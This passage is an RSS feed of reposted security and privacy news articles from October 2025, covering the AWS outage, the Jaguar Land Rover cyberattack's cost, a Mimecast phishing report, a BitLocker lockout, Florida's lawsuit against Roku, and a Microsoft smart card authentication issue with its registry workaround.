<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/13/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>The Long Tail of the AWS Outage</title><link>https://nsaneforums.com/news/security-privacy-news/the-long-tail-of-the-aws-outage-r32017/</link><description><![CDATA[<h3>
	Experts say outages like the one that Amazon experienced this week are almost inevitable given the complexity and scale of cloud technology—but the duration serves as a warning.
</h3>

<p>
	<span class="lead-in-text-callout">A sprawling Amazon</span> Web Services <a href="https://www.wired.com/story/what-that-huge-aws-outage-reveals-about-the-internet/" rel="external nofollow">cloud outage</a> that began early Monday morning illustrated the fragile interdependencies of the internet as major communication, financial, health care, education, and government platforms around the world suffered disruptions. As the <a href="https://www.wired.com/story/the-aws-outage-was-a-nightmare-for-college-students/" rel="external nofollow">day wore on</a>, AWS diagnosed and began working to correct the issue, which stemmed from the company's critical US-EAST-1 region based in northern Virginia. But the cascade of impacts took time to fully resolve.
</p>

<p>
	 
</p>

<p>
	Researchers reflecting on the incident particularly highlighted the length of the outage, which started around 3 am ET on Monday, October 20. AWS said in status updates that by 6:01 pm ET on Monday “all AWS services returned to normal operations.” The outage directly stemmed from Amazon's DynamoDB database application programming interfaces and, according to the company, “impacted” 141 other AWS services. Multiple network engineers and infrastructure specialists emphasized to WIRED that errors are understandable and inevitable for so-called “hyperscalers” like AWS, Microsoft Azure, and Google Cloud Platform, given their complexity and sheer size. But they noted, too, that this reality shouldn't simply absolve cloud providers when they have prolonged downtime.
</p>

<div>
	 
</div>

<p>
	“The word <em>hindsight</em> is key. It's easy to find out what went wrong after the fact, but the overall reliability of AWS shows how difficult it is to prevent every failure,” says Ira Winkler, chief information security officer of the reliability and cybersecurity firm CYE. “Ideally, this will be a lesson learned, and Amazon will implement more redundancies that would prevent a disaster like this from happening in the future—or at least prevent them staying down as long as they did.”
</p>

<p>
	 
</p>

<p>
	AWS did not respond to questions from WIRED about the long tail of the recovery for customers. An AWS spokesperson says the company plans to publish one of its “post-event summaries” about the incident.
</p>

<p>
	 
</p>

<p>
	“I don't think this was just a ‘stuff happens’ outage. I would have expected a full remediation much faster,” says Jake Williams, vice president of research and development at Hunter Strategy. “To give them their due, cascading failures aren't something that they get a lot of experience working with because they don't have outages very often. So that's to their credit. But it's really easy to get into the mindset of giving these companies a pass, and we shouldn't forget that they create this situation by actively trying to attract ever more customers to their infrastructure. Clients don't control whether they are overextending themselves or what they may have going on financially.”
</p>

<p>
	 
</p>

<p>
	The incident was caused by a familiar culprit in web outages—“domain name system” resolution issues. DNS is essentially the internet's phonebook mechanism to direct web browsers to the right servers. As a result, DNS issues are a common source of outages, because they can cause requests to fail and keep content from loading.
</p>

<p>
	 
</p>

<p>
	“Cloud computing is a marvel, but the heart of it is a never-ending list of complex services and dependencies that are always one configuration away from failure,” says Mark St. John, chief operating officer and cofounder of the systems security startup Neon Cyber.
</p>

<p>
	 
</p>

<p>
	Speaking generally about hyperscalers, St. John echoed Williams' point that in exchange for the mature architecture and secure baseline of cloud platforms, customers cede control of their underlying digital infrastructure and the extent to which their cloud provider is or isn't investing in resilience and contingency planning at a given time. “At a certain scale, operational validation for service providers can't be a casualty of cost-cutting,” St. John says.
</p>

<p>
	 
</p>

<p>
	Thinking specifically about Monday's outage, one senior network architect at a major tech company, who requested anonymity because they are not authorized to speak to the press, also emphasized that the time it took for AWS to diagnose and remediate the issues was notable.
</p>

<p>
	 
</p>

<p>
	“It’s extraordinary that they don’t have more failures,” the source said, “but in this case it was weird that what was basically a core service—DynamoDB and the DNS around that—took so long to detect and get to a root cause.”
</p>

<p>
	 
</p>

<p>
	<a href="https://www.wired.com/story/aws-cloud-outage-long-tail/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Thursday 23 October 2025 at 3:36 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">32017</guid><pubDate>Wed, 22 Oct 2025 17:37:33 +0000</pubDate></item><item><title>Jaguar Land Rover looking at $2.5 billion price tag from crippling cyberattack</title><link>https://nsaneforums.com/news/security-privacy-news/jaguar-land-rover-looking-at-25-billion-price-tag-from-crippling-cyberattack-r32016/</link><description><![CDATA[<h3>
	Incident was likely the most economically damaging cyber event in UK history.
</h3>

<p>
	The cyberattack on Jaguar Land Rover is estimated to have cost the UK at least £1.9 billion in what is likely to be “the most economically damaging cyber event” for the country.
</p>

<p>
	 
</p>

<p>
	The month-long shutdown of internal systems and production at JLR affected over 5,000 British organisations, according to an analysis by Cyber Monitoring Centre, a non-profit organization that ranks the severity of cyber events in the UK.
</p>

<p>
	 
</p>

<p>
	“This incident looks to have been by some distance, the single most financially damaging cyber event ever to hit the UK,” said Ciaran Martin, former head of the National Cyber Security Centre and chair of CMC’s technical committee.
</p>

<p>
	 
</p>

<p>
	JLR, which is owned by India’s Tata Motors, only recently restarted partial production of its vehicles in the UK following a shutdown since the August 31 attack.
</p>

<p>
	 
</p>

<p>
	The severe impact on JLR’s suppliers prompted the UK government to intervene with a £1.5 billion loan guarantee to make it easier for the carmaker to access credit.
</p>

<p>
	 
</p>

<p>
	CMC mainly attributes the financial cost to the fall in vehicle sales and lower profits caused by the production halt, the costs to address the incident, and the impact on its supply chain and other local businesses.
</p>

<p>
	 
</p>

<p>
	Its estimate is also based on the assumption that JLR would not be able to fully restore its production until January and that the attackers did not infiltrate its so-called “operational technology,” which, if they had, would take longer to resolve.
</p>

<p>
	 
</p>

<p>
	There has been a spate of ransomware attacks on UK companies and organizations in recent years, including retailers Marks and Spencer and Co-op, in addition to NHS England.
</p>

<p>
	 
</p>

<p>
	The CMC estimated in June that the financial impact of the attacks on the two retailers was between £270 million and £440 million.
</p>

<p>
	 
</p>

<p>
	The investigation into the JLR attack is being led by the National Crime Agency but few details have emerged on who was behind the incident. The CMC estimate did not include assumptions about whether JLR had paid a ransom or not.
</p>

<p>
	 
</p>

<p>
	Martin said companies tended to focus their resources on protecting themselves against data breaches since they have a legal obligation to protect customer data.
</p>

<p>
	 
</p>

<p>
	But cases like JLR underscore the increasing risks of attackers not just stealing data but destroying critical networks supporting a company’s operations, and the high costs associated with such attacks.
</p>

<p>
	 
</p>

<p>
	While state actors have not been behind recent attacks on M&amp;S and other retailers, Martin warned that there was an increasing “geopolitical vulnerability” and risk that hostile nation states could attack UK businesses for non-financial reasons.
</p>

<p>
	 
</p>

<p>
	“It is now clear not just that criminal disruptive attacks are the worst problem in cybersecurity right now, but they’re a playbook to hostile nation states on how to attack us,” Martin said at a separate speech in London on Wednesday. “So cybersecurity has become economic security. And economic security is national security.”
</p>

<p>
	 
</p>

<p>
	Last week, the UK National Cyber Security Centre also warned that state actors continued to pose “a significant threat” to Britain and global cyber security, citing the risks posed by China, Russia, and others.
</p>

<p>
	 
</p>

<p>
	According to an annual review by NCSC, the UK had suffered 204 “nationally significant [cyber] incidents” in the 12 months to August 2025, compared with 89 in the same period a year earlier.
</p>

<p>
	 
</p>

<p>
	The term is used to describe the three most serious types of incidents as defined by UK law enforcement.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/security/2025/10/jaguar-land-rover-struggling-8-weeks-after-most-expensive-uk-cyberattack/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Thursday 23 October 2025 at 3:35 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">32016</guid><pubDate>Wed, 22 Oct 2025 17:35:54 +0000</pubDate></item><item><title>Are we human or are we security risk?</title><link>https://nsaneforums.com/news/security-privacy-news/are-we-human-or-are-we-security-risk-r32014/</link><description><![CDATA[<p>
	Not quite how The Killers put it, but a new report shows human workers remain the most consistent point of attack for cybercriminals, with shadow IT and AI-driven social engineering providing attackers with both new tools and new targets.
</p>

<p>
	 
</p>

<p>
	The 2025 Global Threat Intelligence Report from Mimecast reveals key trends, including the rise of smarter, AI-powered phishing and social engineering cyberattacks, and threat groups increasingly using trusted services to evade detection and reach targets. Mimecast’s analysis finds that phishing accounts for 77 percent of all attacks, up from 60 percent in 2024, with attackers likely leveraging more AI tools.
</p>

<p>
	 
</p>

<p>
	“We’re seeing a clear evolution in attacker behavior in 2025, headlined by an exponential rise in AI-driven threats,” says Ranjan Singh, Mimecast chief product and technology officer. “Financial platforms, regulatory agencies, and city governments have all been targeted by profit-driven ransomware groups and highly organized, state-sponsored adversaries. Threat actors are doubling down on human-focused attacks and exploiting trusted business services as their primary means of intrusion, making employee awareness and resilient systems more essential than ever.”
</p>

<p>
	 
</p>

<p>
	Generative AI has given threat actors more power to create the perfect lure, impersonating vendors, partners, and employees. They are now able to craft convincing email chains, synthetic voices, and audio messages that can bypass detection tools.
</p>

<p>
	Mimecast research shows a significant increase in social engineering attacks, including schemes like ClickFix, AI-augmented phishing, and business email compromise (BEC). These attacks are becoming increasingly sophisticated, with attackers leveraging automated conversation chains to create the illusion of legitimate communication in phishing emails.
</p>

<p>
	 
</p>

<p>
	Trusted business tools are being exploited too: platforms like Adobe Pay, DocuSign, and Salesforce are being used within attack chains, with virtual meeting room and hosting service DocSend becoming the most abused service in 2025.
</p>

<p>
	 
</p>

<p>
	Certain industries are in the firing line too, with professional education, IT software, telecommunications, real estate, and legal organizations seeing a higher volume of impersonation attacks. These sectors often have direct access to high-value targets, handle sensitive financial transactions and manage confidential client information, making them attractive to attackers.
</p>

<p>
	 
</p>

<p>
	“Cyber defense can no longer be treated solely as a technology issue,” says Mimecast chief information security officer, Leslie Nielsen. “It’s equally about people and organizational resilience. Since last year, cybercriminals have significantly increased their use of trusted services to bypass technical defenses that might otherwise block attacks. Countering these threats requires organizations to adapt by preparing employees to recognize suspicious activity and leveraging tools like AI internally to enhance both business workflows and security operations. As threat actors continue to target the human layer through deception, trust exploitation, and multichannel coordination, building awareness and resilient response capabilities becomes critical.”
</p>

<p>
	 
</p>

<p>
	The <a href="https://www.mimecast.com/resources/ebooks/threat-intelligence-january-june-2025/" rel="external nofollow">full report</a> is available from the Mimecast site.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://betanews.com/2025/10/22/are-we-human-or-are-we-security-risk/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">32014</guid><pubDate>Wed, 22 Oct 2025 14:33:46 +0000</pubDate></item><item><title>Windows 11's BitLocker encryption permanently locks 3TB of a user's backups &#x2014; "Filled my PC with more spyware and viruses than I can count"</title><link>https://nsaneforums.com/news/security-privacy-news/windows-11s-bitlocker-encryption-permanently-locks-3tb-of-a-users-backups-%E2%80%94-filled-my-pc-with-more-spyware-and-viruses-than-i-can-count-r32002/</link><description><![CDATA[<h3>
	A Reddit user runs into some trouble after the security tool reportedly activated itself, locking them out of two storage drives.
</h3>

<p id="c10e5cbd-ec25-400c-af9d-88c64a46d892">
	From as early as <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/tag/windows-vista/page/2" href="https://www.windowscentral.com/tag/windows-vista/page/2" rel="external nofollow">Windows Vista</a>, Microsoft's operating systems started shipping with an important security feature called <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/how-configure-bitlocker-encryption-windows-11" href="https://www.windowscentral.com/how-configure-bitlocker-encryption-windows-11" rel="external nofollow">BitLocker</a>. It's a feature designed to protect sensitive data and information from unauthorized access through encryption.
</p>

<p>
	 
</p>

<p>
	BitLocker is enabled by default in Windows 11 when you first sign in or set up a device with a Microsoft account. Last year, the company made this change while releasing <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/windows-11/windows-11-version-24h1-changelog-release-date-features-ai-2024-update" href="https://www.windowscentral.com/software-apps/windows-11/windows-11-version-24h1-changelog-release-date-features-ai-2024-update" rel="external nofollow">Windows 11, version 24H2</a>.
</p>

<p>
	 
</p>

<p aria-hidden="true" id="c10e5cbd-ec25-400c-af9d-88c64a46d892-2">
	The Windows update also made BitLocker accessible to a broader range of devices, including those running Windows 11 Pro and Home, because it is less demanding in terms of hardware requirements. Users no longer need Hardware Security Test Interface (HSTI) or Modern Standby to access the feature.
</p>

<p>
	 
</p>

<p id="50909d0b-8729-42f5-a617-b8b82d2229b8">
	But if the past few months are anything to go by, storage and backing up your data on the cloud are very sensitive topics. Remember when <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/onedrive-user-locked-out-of-30-years-worth-of-photos" href="https://www.windowscentral.com/software-apps/onedrive-user-locked-out-of-30-years-worth-of-photos" rel="external nofollow">a OneDrive user was locked out of "30 years' worth of photos and work"</a> without any support? As it happens, a user recently shared an unfortunate incident where they ended up losing access to 3TB worth of games and backups.
</p>

<p>
	 
</p>

<p>
	The user indicated that they'd noticed that their PC was a tad laggy, prompting them to reinstall Windows 11. They further indicated that they'd never enabled BitLocker before since they didn't necessarily need it. However, when they reinstalled Windows 11, two out of the six drives in the gaming PC (built on an AORUS B550 Elite AX v2 motherboard, a Ryzen 7 5700X3D CPU, 64GB of RAM, and a 12GB <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/nvidia-geforce" href="https://www.windowscentral.com/tag/nvidia-geforce" rel="external nofollow">GeForce</a> RTX 3060 GPU) were encrypted.
</p>

<p>
	 
</p>


<p id="8a5dc549-0575-435d-ae00-e0a42345fc40">
	<em>"Can't access 3TB of data! It's asking for a key but I never set one up,"</em> <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.reddit.com/r/pcmasterrace/comments/1o9i0or/bitlocker_turned_itself_on_3tb_of_games_and/?" href="https://www.reddit.com/r/pcmasterrace/comments/1o9i0or/bitlocker_turned_itself_on_3tb_of_games_and/?" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">Toast Soup added on Reddit</a>. <em>"Google only gives results if your boot drive is Bitlocked, not a D: or E: storage drive. I ran some data recovery software but it shows zero files to recover."</em>
</p>

<p>
	 
</p>

<p>
	<em>"Help me Reddit. You're my only hope...,"</em> the user indicated. Perhaps more concerningly, Toast Soup admitted that they dug themselves deeper into the rabbit hole, <em>"using every damn data retrieval program"</em> in a bid to regain access to the encrypted drives with the games and backups. <em>"I went to a lot of sketchy sites and downloaded torrents that I'm sure filled my PC with more spyware and viruses than I can count."</em>
</p>

<p>
	 
</p>

<div id="slice-container-newsletterForm-articleInbodyContent-8tuCq4Vzg4kiWuntfqRMrB">
	<div data-hydrate="true">
		<p>
			Eventually, they decided to perform a clean install of Windows 11, but the BitLocker screen reappeared. Luckily, they had the key for this one. While the user was able to get back to Windows, the storage drives remained encrypted. Ultimately, the user lost hope and pulled the plug on the whole thing.
		</p>

		<figure id="95be3ade-a019-444e-b074-6d3c67a7eccd">
			<blockquote class="QuoteNewsStyle">
				<p>
					I've given up, boys. Can't get into the no matter what I try. Thirty seconds ago I pressed the format button and nuked *years* of data. I have some backups but I think they're too old.
				</p>

				<p>
					 
				</p>

				<p>
					<em><cite>Toast Soup on Reddit.</cite></em>
				</p>
			</blockquote>
		</figure>

		<p id="aee9f719-5156-40eb-9dd8-8a17c84a623e">
			Per <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.tomshardware.com/software/windows/bitlocker-reportedly-auto-locks-users-backup-drives-causing-loss-of-3tb-of-valuable-data-windows-automatic-disk-encryption-can-permanently-lock-your-drives" href="https://www.tomshardware.com/software/windows/bitlocker-reportedly-auto-locks-users-backup-drives-causing-loss-of-3tb-of-valuable-data-windows-automatic-disk-encryption-can-permanently-lock-your-drives" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">Tom's Hardware's</a> testing, BitLocker is also a resource-intensive security tool that can slow down random read/write speeds of the affected SSDs by up to 45%. The outlet indicated that this was because the tool forces your processor to encrypt and decrypt every single thing.
		</p>

		<p>
			 
		</p>

		<p>
			Based on this premise, it is highly likely that Toast Soup had BitLocker enabled by default in Windows 11, especially after Microsoft made the change when releasing Windows 11, version 24H2. The laggy device is a major telltale sign.
		</p>

		<p>
			 
		</p>

		<p>
			However, it's still obviously unfortunate that the user couldn't access the key to unlock the encrypted drives. This is despite numerous attempts, including trying to recover the key from their Microsoft account. Be careful with your backups.
		</p>

		<p>
			 
		</p>

		<p>
			<a href="https://www.windowscentral.com/microsoft/bitlocker-encryption-permanently-locks-3tb-of-a-users-backups" rel="external nofollow">Source</a>
		</p>

		<hr class="ipsHr">
		<p>
			<span style="font-size:12px;"><em>Posted Wednesday 22 October 2025 at 4:38 am AEST (my time).</em></span>
		</p>

	</div>
</div>
]]></description><guid isPermaLink="false">32002</guid><pubDate>Tue, 21 Oct 2025 18:40:55 +0000</pubDate></item><item><title>Amazon&#x2019;s DNS problem knocked out half the web, likely costing billions</title><link>https://nsaneforums.com/news/security-privacy-news/amazon%E2%80%99s-dns-problem-knocked-out-half-the-web-likely-costing-billions-r32001/</link><description><![CDATA[<h3>
	Amazon’s outage is over. But backlash over billions in losses has just started.
</h3>

<p>
	On Monday afternoon, <a href="https://health.aws.amazon.com/health/status" rel="external nofollow">Amazon confirmed</a> that an outage affecting Amazon Web Services’ cloud hosting, which had impacted millions across the Internet, had been resolved.
</p>

<p>
	 
</p>

<p>
	Considered the worst outage since <a href="https://arstechnica.com/information-technology/2024/07/major-outages-at-crowdstrike-microsoft-leave-the-world-with-bsods-and-confusion/" rel="external nofollow">last year’s CrowdStrike chaos</a>, Amazon’s outage caused “global turmoil,” Reuters <a href="https://www.reuters.com/business/retail-consumer/amazons-cloud-unit-reports-outage-several-websites-down-2025-10-20/" rel="external nofollow">reported</a>. AWS is the world’s largest cloud provider and, therefore, the “backbone of much of the Internet,” ZDNet <a href="https://www.zdnet.com/home-and-office/networking/the-massive-aws-outage-that-broke-half-the-internet-is-finally-over-heres-what-happened/" rel="external nofollow">noted</a>. Ultimately, more than 28 AWS services were disrupted, causing perhaps billions in damages, one analyst <a href="https://www.cnn.com/business/live-news/amazon-tech-outage-10-20-25-intl" rel="external nofollow">estimated</a> for CNN.
</p>

<p>
	 
</p>

<p>
	Popular apps like Snapchat, Signal, and Reddit went dark. Flights got delayed. Banks and financial services went down. Massive games like <em>Fortnite</em> could not be accessed. Some of Amazon’s own services were hit, too, including its e-commerce platform, Alexa, and Prime Video. Ultimately, millions of businesses simply stopped operating, unable to log employees into their systems or accept payments for their goods.
</p>

<p>
	 
</p>

<p>
	“The incident highlights the complexity and fragility of the Internet, as well as how much every aspect of our work depends on the Internet to work,” Mehdi Daoudi, the CEO of an Internet performance monitoring firm called Catchpoint, told CNN. “The financial impact of this outage will easily reach into the hundreds of billions due to loss in productivity for millions of workers that cannot do their job, plus business operations that are stopped or delayed—from airlines to factories.”
</p>

<p>
	 
</p>

<p>
	Amazon’s problems originated at a US site that is its “oldest and largest for web services” and often “the default region for many AWS services,” Reuters <a href="https://www.reuters.com/business/retail-consumer/amazons-cloud-unit-reports-outage-several-websites-down-2025-10-20/" rel="external nofollow">noted</a>. The same site has experienced two outages before, in 2020 and 2021, but while the tech giant had confirmed that those prior issues had been “fully mitigated,” apparently the fixes did not ensure stability into 2025.
</p>

<p>
	 
</p>

<p>
	ZDNet noted that Amazon’s first sign of the outage was “increased error rates and latency across numerous key services” tied to its cloud database technology. Although “engineers later identified a Domain Name System (DNS) resolution problem” as the root of these issues and quickly fixed it, “other AWS services began to fail in its wake, leaving the platform still impaired” as more than two dozen AWS services shut down.
</p>

<p>
	 
</p>

<p>
	At the peak of the outage on Monday, Down Detector tracked more than 8 million reports globally from users panicked by the outage, ZDNet reported.
</p>

<p>
	 
</p>

<p>
	Ken Birman, a computer science professor at Cornell University, told Reuters that “software developers need to build better fault tolerance,” suggesting Amazon could have done more to prevent the latest outage.
</p>

<p>
	 
</p>

<p>
	“When people cut costs and cut corners to try to get an application up, and then forget that they skipped that last step and didn’t really protect against an outage, those companies are the ones who really ought to be scrutinized later,” Birman told Reuters.
</p>

<p>
	 
</p>

<p>
	For Amazon, the backlash risks hitting its bottom line hard if too many customers pivot to other cloud technology providers. Financial services firms, which may be the most risk-averse of Amazon’s customers, think the solution might be a “multi-cloud” strategy, “distributing critical workloads across two or more major providers, such as AWS, Microsoft Azure, and Google Cloud,” Forbes <a href="https://www.forbes.com/sites/christerholloman/2025/10/20/aws-outage-billions-lost-multi-cloud-is-wall-streets-solution/" rel="external nofollow">reported</a>.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/tech-policy/2025/10/amazons-dns-problem-knocked-out-half-the-web-likely-costing-billions/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Wednesday 22 October 2025 at 4:37 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">32001</guid><pubDate>Tue, 21 Oct 2025 18:38:08 +0000</pubDate></item><item><title>Roku accused of selling children&#x2019;s data to advertisers and brokers</title><link>https://nsaneforums.com/news/security-privacy-news/roku-accused-of-selling-children%E2%80%99s-data-to-advertisers-and-brokers-r31990/</link><description><![CDATA[
	<div>
		<em><span>October 16, 2025</span> </em><span><em> by</em> <span><a href="https://www.malwarebytes.com/blog/authors/dbradbury" rel="external nofollow">Danny Bradbury</a></span></span>
	</div>


<div>
	<p>
		 
	</p>

	<p>
		The state of Florida has accused Roku, which powers many smart TVs and streaming devices, of selling children’s data to third parties without their consent.
	</p>

	<p>
		 
	</p>

	<p>
		According to the Florida Attorney General James Uthmeier, Roku collected viewing habits, voice recordings, and precise geolocation from kids without approval from parents.
	</p>

	<p>
		 
	</p>

	<p>
		Roku, which reaches around 145 million people across half of US households, allegedly gathered children’s data despite clear signals that the viewers were minors, the AG said.
	</p>

	<p>
		 
	</p>

	<p>
		After collecting the data, Roku made it available to advertisers and sold it to data brokers, including Kochava, according to the Florida government.
	</p>

	<p>
		 
	</p>

	<p>
		Kochava is already facing its own lawsuit from the Federal Trade Commission, which claims the company sells highly sensitive consumer information.
	</p>

	<p>
		 
	</p>

	<p>
		Uthmeier’s office said in a <a href="https://www.myfloridalegal.com/newsrelease/attorney-general-james-uthmeiers-office-parental-rights-files-enforcement-action#main-content" rel="external nofollow">news release</a>:
	</p>

	<blockquote style="font-size:22px;line-height:30px;">
		<p>
			“The State contends that Roku’s practices violated Florida’s privacy and consumer-protection laws by failing to obtain parental consent before selling or processing children’s data and by misrepresenting the effectiveness of its privacy controls and opt-out tools.”
		</p>
	</blockquote>

	<p>
		In the complaint filed in court, the AG’s office accused Roku of turning a blind eye to the collection of minors’ data.
	</p>

	<blockquote style="font-size:22px;line-height:30px;">
		<p>
			“Roku knows that some of its users are children but has consciously decided not to implement industry-standard user profiles to identify which of its users are children.”
		</p>
	</blockquote>

	<p>
		The lawsuit claims Roku ignored obvious indicators, such as when users installed its Kids Screensaver or Kids Theme Pack products.
	</p>

	<p>
		 
	</p>

	<p>
		Uthmeier’s office also said that although Roku sells deidentified data to brokers (that is, data that has identifying information removed), it’s still possible for brokers like Kochava to reidentify users.
	</p>

	<p>
		 
	</p>

	<p>
		Brokers often have troves of information of their own, such as device IDs linked to potentially identifying information, which can allow them to match records to specific people.
	</p>

	<p>
		 
	</p>

	<p>
		Florida has filed the lawsuit under the Florida Digital Bill of Rights (FDBR), which came into effect on July 1, 2024.
	</p>

	<p>
		 
	</p>

	<p>
		The law protects Florida residents’ privacy, including children’s data rights, and gives parents the ability to opt out of data processing for their kids.
	</p>

	<p>
		 
	</p>

	<p>
		The penalty for violating the FDBR is up to $50,000 per violation, but that triples for violations where the consumer involved is a known child. That includes cases of “willful disregard of a child’s age.”
	</p>

	<p>
		 
	</p>

	<p>
		This isn’t the only case that Roku must navigate in court.
	</p>

	<p>
		 
	</p>

	<p>
		In April, Michigan Attorney General Dana Nessel also <a href="https://www.regulatoryoversight.com/2025/08/streaming-under-scrutiny-rokus-response-to-michigan-ags-allegations-of-coppa-and-other-privacy-law-violations/" rel="external nofollow">sued Roku</a> for similar violations, accusing it of violating laws including the Children’s Online Privacy Protection Act (COPPA), along with federal and state privacy laws. Roku is fighting the suit.
	</p>

	<p>
		 
	</p>

	<p>
		Smart TV advertising is big business in the US.
	</p>

	<p>
		 
	</p>

	<p>
		So much so, in fact, that Roku appears to sell its devices at a loss to power its platform revenues, which include not just subscriptions, but advertising.
	</p>

	<p>
		 
	</p>

	<p>
		In fiscal 2024, it <a href="https://image.roku.com/c3VwcG9ydC1B/4Q24-Shareholder-Letter.pdf" rel="external nofollow">lost</a> $80.3 million on device sales, up from $43.9 million in device-based losses the prior year. Yet it made $1.9 billion profit from its platform business, up from $1.567 billion in 2023.
	</p>

	<p>
		 
	</p>

	<p>
		According to <a href="https://themarkup.org/privacy/2023/12/12/your-smart-tv-knows-what-youre-watching" rel="external nofollow">reports</a>, Roku’s Automatic Content Recognition (ACR) technology <a href="https://docs.roku.com/published/acrservicepolicy/en/ca" rel="external nofollow">captures</a> thousands of images each hour from smart TVs. These can be used to help track viewing activity.
	</p>

	<p>
		 
	</p>

	<p>
		In January, Roku launched its Data Cloud, a service that allows its partners to use the company’s proprietary TV data. It was the latest step in a multi-year strategy to build out its data offering.
	</p>

	<p>
		 
	</p>

	<p>
		In 2022, it <a href="https://www.adexchanger.com/digital-tv/not-to-be-left-out-roku-announces-its-clean-room-service-in-time-for-the-upfronts/" rel="external nofollow">launched</a> a ‘clean room’ product that allowed other companies to combine their data with Roku’s own, conducting queries about viewer behavior while preserving privacy (this is how companies access its Data Cloud).
	</p>

	<p>
		 
	</p>

	<p>
		Then, in 2024, it launched Roku Exchange—an advertising hub for partners.
	</p>

	<p>
		 
	</p>

	<p>
		<a href="https://www.malwarebytes.com/blog/news/2025/10/roku-accused-of-selling-childrens-data-to-advertisers-and-brokers?utm_source=iterable&amp;utm_medium=email&amp;utm_campaign=b2c_pro_oth_20251020_octoberweeklynewsletter_v3_176069215103&amp;utm_content=Roku_logo" rel="external nofollow">Source</a>
	</p>
</div>
]]></description><guid isPermaLink="false">31990</guid><pubDate>Mon, 20 Oct 2025 18:16:40 +0000</pubDate></item><item><title>Microsoft warns of Windows smart card auth issues after October updates</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-warns-of-windows-smart-card-auth-issues-after-october-updates-r31985/</link><description><![CDATA[<p>
	Microsoft says the October 2025 Windows security updates are causing smart card authentication and certificate issues due to a change designed to strengthen the Windows Cryptographic Services.
</p>

<p>
	 
</p>

<p>
	This known issue impacts all Windows 10, Windows 11, and Windows Server releases, including the latest versions designated for broad deployment.
</p>

<p>
	 
</p>

<p>
	Affected users may observe various symptoms, from the inability to sign documents and failures in applications that use certificate-based authentication to smart cards not being recognized as CSP providers (Cryptographic Service Provider) in 32-bit apps.
</p>

<p>
	 
</p>

<p>
	They can also see "invalid provider type specified" and "CryptAcquireCertificatePrivateKey error" error messages.
</p>

<p>
	 
</p>

<p>
	"This issue is linked to a recent Windows security improvement to use KSP (Key Storage Provider) instead of CSP (Cryptographic Service Provider) for RSA-based smart card certificates to improve cryptography," <a href="https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-25h2#3697msgdesc" rel="external nofollow" target="_blank">Microsoft said</a>.
</p>

<p>
	 
</p>

<p>
	"You can detect if your smart card will be affected by this issue if you observe the presence of Event ID 624 in the System event logs for the Smart Card Service prior to installing the October 2025 Windows security update."
</p>

<p>
	 
</p>

<p>
	As the company explained, this known issue occurs because this month's security updates automatically enable by default a security fix designed to address a security feature bypass vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30098" rel="external nofollow" target="_blank">CVE-2024-30098</a>) in the Windows Cryptographic Services, a built-in Windows service that handles security-related and cryptographic operations.
</p>

<p>
	 
</p>

<p>
	This fix is enabled by setting the DisableCapiOverrideForRSA registry key value to 1 to isolate cryptographic operations from the Smart Card implementation and block attackers from creating a SHA1 hash collision to bypass digital signatures on vulnerable systems.
</p>

<p>
	 
</p>

<p>
	Those who are experiencing authentication problems can manually resolve them by disabling the DisableCapiOverrideForRSA registry key using the following procedure:
</p>

<p>
	 
</p>

<ol>
	<li>
		Open Registry Editor. Press Win + R, type regedit, and press Enter. If prompted by User Account Control, click Yes.
	</li>
	<li>
		Navigate to the subkey. Go to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Calais.
	</li>
	<li>
		Edit the key and set the value. Inside Calais, check if key DisableCapiOverrideForRSA exists. Double-click DisableCapiOverrideForRSA. In Value data, enter: 0.
	</li>
	<li>
		Close and restart. Close Registry Editor. Restart the computer for changes to take effect.
	</li>
</ol>

<p>
	 
</p>

<p>
	However, it's important to note that you should back up the registry before editing it, because any errors could lead to system issues.
</p>

<p>
	 
</p>

<p>
	While this will mitigate the issue, the DisableCapiOverrideForRSA registry key will be removed in April 2026, and Microsoft advised affected users to work with their application vendors to resolve the underlying problem.
</p>

<p>
	 
</p>

<p>
	Redmond fixed a similar issue that <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-10-auth-issue-impacting-remote-desktop/" rel="external nofollow" target="_blank">caused smartcard authentication failures</a> on Windows 10 systems when connecting via Remote Desktop.
</p>

<p>
	 
</p>

<p>
